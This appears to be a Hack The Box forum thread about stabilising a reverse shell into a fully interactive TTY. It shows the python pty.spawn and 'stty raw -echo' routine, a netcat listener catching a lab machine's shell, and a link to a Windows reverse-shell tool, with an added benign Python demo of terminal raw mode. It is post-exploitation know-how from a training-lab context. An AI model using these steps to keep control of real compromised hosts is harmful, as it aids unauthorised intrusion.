Obtaining a Fully Interactive Shell


Comments

  • @KeyboardCaper said:

    After getting a terminal:

    python -c 'import pty; pty.spawn("/bin/bash")'
    CTRL-z
    bg
    stty raw -echo
    fg
    reset
    (In case of unknown terminal type try: linux)

    Optional:
    export SHELL=/bin/bash
    export TERM=xterm-color
    export HOME=

    Then fix up the rows and columns. Open another terminal
    stty -a

    Get the rows and columns.

    Back on your reverse shell:
    stty rows <> columns <>

    Rarely does the python part not work... when it doesn't I simply find a work around or just deal with what I have.

    Probably good to note for this that python -c 'import pty;pty.spawn("/bin/bash")' won't work with any versions of Python3, so specifying python3 -c ... is necessary. Otherwise solid description, you nailed it to a "T".


    Hack The Box
    defarbs.com - "Let me just quote the late, great Colonel Sanders, who said, 'I'm too drunk... to taste this chicken.'"

  • I have a curious problem with this kind of shell. I'm working with the Kali KDE distribution with the standard Konsole terminal and /bin/bash/.

    I start a reverse shell from another machine.

    On my attacking machine I have netcat listening:
    nc -l -v -p 80

    I get the connection on my host:
    listening on [any] 80 ...
    connect to [10.10.14.2] from craft.htb [10.10.10.110] 40575
    /bin/sh: can't access tty; job control turned off
    /opt/app #

    I do my routine to elevate the shell:
    python -c 'import pty; pty.spawn("/bin/bash")'
    CTRL-z
    stty raw -echo
    fg
    reset

    I have a fully functional shell BUT I can't close it. I'll always have to kill the process. I use exit to leave the shell and end up in a window where I can't enter any commands. At first I thought that it is a problem with zsh (stty raw -echo; fg kind of) but it is the same in /bin/bash and in Xterm instead of Konsole.

    Any ideas what could go wrong here?

    On a side note, what if I don't have a /bin/bash on the remote machine? Is it possible to get a fully interactive shell?

  • edited September 10

    @timebeyond said:
    I have a fully functional shell BUT I can't close it. I'll always have to kill the process. I use exit to leave the shell and end up in a window where I can't enter any commands. At first I thought that it is a problem with zsh (stty raw -echo; fg kind of) but it is the same in /bin/bash and in Xterm instead of Konsole.

    I actually had this exact same issue when I was working on networked. I had to kill the process, but I am not sure what went wrong.

    On a side note, what if I don't have a /bin/bash on the remote machine? Is it possible to get a fully interactive shell?

    You can use /bin/sh, which is most of the time just a symbolic link to the real active shell.
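
What the `stty raw -echo` step in the routine discussed above changes on the local terminal, and how the earlier settings can be saved and put back, shown as an added example that is not part of any post in this thread. It assumes a Linux host and uses a constructed pseudo-terminal pair in place of a real terminal window.

```python
import os
import pty
import termios
import tty

# Indices into the list returned by termios.tcgetattr()
OFLAG, LFLAG = 1, 3


def describe(attrs):
    """Summarise the terminal flags that matter for an interactive session."""
    lflag = attrs[LFLAG]
    return {
        "echo": bool(lflag & termios.ECHO),      # typed characters are echoed locally
        "icanon": bool(lflag & termios.ICANON),  # input is line-buffered and editable
        "isig": bool(lflag & termios.ISIG),      # Ctrl-C / Ctrl-Z raise signals locally
        "opost": bool(attrs[OFLAG] & termios.OPOST),  # output newline translation
    }


def raw_mode_roundtrip():
    """Return (before, during, after) flag summaries for a constructed pty."""
    # Constructed terminal pair; the slave end stands in for the local terminal.
    master, slave = pty.openpty()
    try:
        saved = termios.tcgetattr(slave)   # comparable to saving `stty -g` output
        before = describe(saved)
        tty.setraw(slave)                  # comparable to `stty raw -echo`
        during = describe(termios.tcgetattr(slave))
        # Put the saved settings back, as `stty "$saved"` or `reset` would.
        termios.tcsetattr(slave, termios.TCSANOW, saved)
        after = describe(termios.tcgetattr(slave))
        return before, during, after
    finally:
        os.close(master)
        os.close(slave)


if __name__ == "__main__":
    for label, state in zip(("before", "raw", "restored"), raw_mode_roundtrip()):
        print(f"{label:9}", state)
```

In raw mode the local terminal no longer echoes, line-buffers or turns Ctrl-C into a signal, so every keystroke passes straight through to the remote side; those settings stay in effect on the local terminal until something restores them.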

  • Thanks for the reassurance that my standard setup has no flaws. Just wanted to be sure that the problem isn't between the keyboard and the chair.

  • edited September 19

    If you are looking for a way to get a fully interactive shell on Windows, I just released a C#/PowerShell reverse shell that implements the pty console. Here is the link: https://github.com/antonioCoco/ConPtyShell
